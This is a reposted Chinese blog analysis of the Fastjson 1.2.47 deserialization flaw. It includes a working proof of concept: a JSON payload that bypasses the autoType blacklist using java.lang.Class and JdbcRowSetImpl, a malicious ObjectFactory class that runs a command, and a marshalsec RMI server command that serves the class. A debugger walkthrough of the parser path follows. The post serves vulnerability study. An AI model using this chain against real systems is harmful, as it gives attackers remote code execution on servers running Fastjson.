转载

Fastjson =< 1.2.47 反序列化漏洞分析

@Author: Patrilic @Time: 2020-3-14 23:08:55

0x00 RMI和LDAP的适用版本

RMI的利用方式：适用jdk版本：JDK 6u132, JDK 7u122, JDK 8u113之前。
LDAP的利用方式：适用jdk版本：JDK 11.0.1、8u191、7u201、6u211之前。

0x01 Poc

Exp.java

package com.patrilic.fastjson;

import com.alibaba.fastjson.JSON;
//import com.alibaba.fastjson.JSONObject;

public class exp {
    public static void main(String[] argv) {
//        System.out.print("Success");
        String payload = "{/"name/":{/"@type/":/"java.lang.Class/",/"val/":/"com.sun.rowset.JdbcRowSetImpl/"},/"x/":{/"@type/":/"com.sun.rowset.JdbcRowSetImpl/",/"dataSourceName/":/"rmi://localhost:1099/Exploit/",/"autoCommit/":true}}}";
        JSON.parse(payload);
    }
}

Exploit.java

import javax.naming.Context;
import javax.naming.Name;
import javax.naming.spi.ObjectFactory;
import java.io.IOException;
import java.util.Hashtable;

public class Exploit implements ObjectFactory {

    @Override
    public Object getObjectInstance(Object obj, Name name, Context nameCtx, Hashtable<?, ?> environment) {
        exec("xterm");
        return null;
    }

    public static String exec(String cmd) {
        try {
            Runtime.getRuntime().exec("/System/Applications/Calculator.app/Contents/MacOS/Calculator");
        } catch (IOException e) {
            e.printStackTrace();
        }
        return "";
    }

    public static void main(String[] args) {
        exec("123");
    }
}

RMI服务器由 marshalsec-0.0.3-SNAPSHOT-all.jar 启动

java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer http://127.0.0.1:8001//#Exploit

运行exp的时候，发现并不能成功执行

因为jdk版本不支持，当前版本为8u191，ldap和rmi的方式都不行，切换版本到7u80

Fastjson =< 1.2.47 反序列化漏洞分析

0x02 漏洞分析

程序最先进入到 DefaultJSONNParser ，将整个payload作为参数传入Json的解释器，进入到 DefaultJsonParser.parser() 函数

经过逐位的数据读取，将Json的Key分割开，调用 addSymbol() 函数加入到 symbolTable
Fastjson =< 1.2.47 反序列化漏洞分析

如果获取到的key是 @type ，就通过 clazz = this.config.checkAutoType(typeName, (Class)null, lexer.getFeatures()) 是否是黑名单中的类

因为 @type == "java.lang.class ，不在黑名单内，所以会将value带入加载

跟进deserializer

可以看到StrVal = objVal，而objVal就是等于poc中给出的val参数

Fastjson =< 1.2.47 反序列化漏洞分析

然后下面经过一堆if判断，进入到

TypeUtils.loadClass(strVal, parser.getConfig().getDefaultClassLoader())
Fastjson =< 1.2.47 反序列化漏洞分析

跟进 loadClass()
Fastjson =< 1.2.47 反序列化漏洞分析

MiscCode:548行

最后进入JdbcRowSetImpl通过调用SetAutoCommit() -> connect()对dataSourceName进行lookup，实现rmi注入

com/alibaba/fastjson/parser/DefaultJSONParser.class
Fastjson =< 1.2.47 反序列化漏洞分析

Fastjson =< 1.2.47 反序列化漏洞分析

原文 https://patrilic.top/2020/03/14/Fastjson =< 1.2.47 反序列化漏洞分析/

正文到此结束

所属分类： Java 编程技术

本文标签： java js parse http rmi https App src JDBC db CTO lib HashTable cmd 漏洞 dataSource id tab IDE 参数 IO ldap 数据 value Features ssl cat key autocommit 服务器 json ACE
版权声明： 本文为互联网转载文章，出处已在文章中说明(部分除外)。如果侵权，请联系本站长删除，谢谢。
本文海报： 生成海报一生成海报二

其他链接

关于本站

本站定位：个人技术类博客

本站作用：写博客、记日志、闲聊扯淡鼓捣技术。

问题交流

Fastjson =< 1.2.47 反序列化漏洞分析

0x00 RMI和LDAP的适用版本

0x01 Poc

0x02 漏洞分析

热门推荐

相关文章

说给你听

本文目录

随机标签

书籍教程

近期评论

网站信息

其他链接

关于本站

问题交流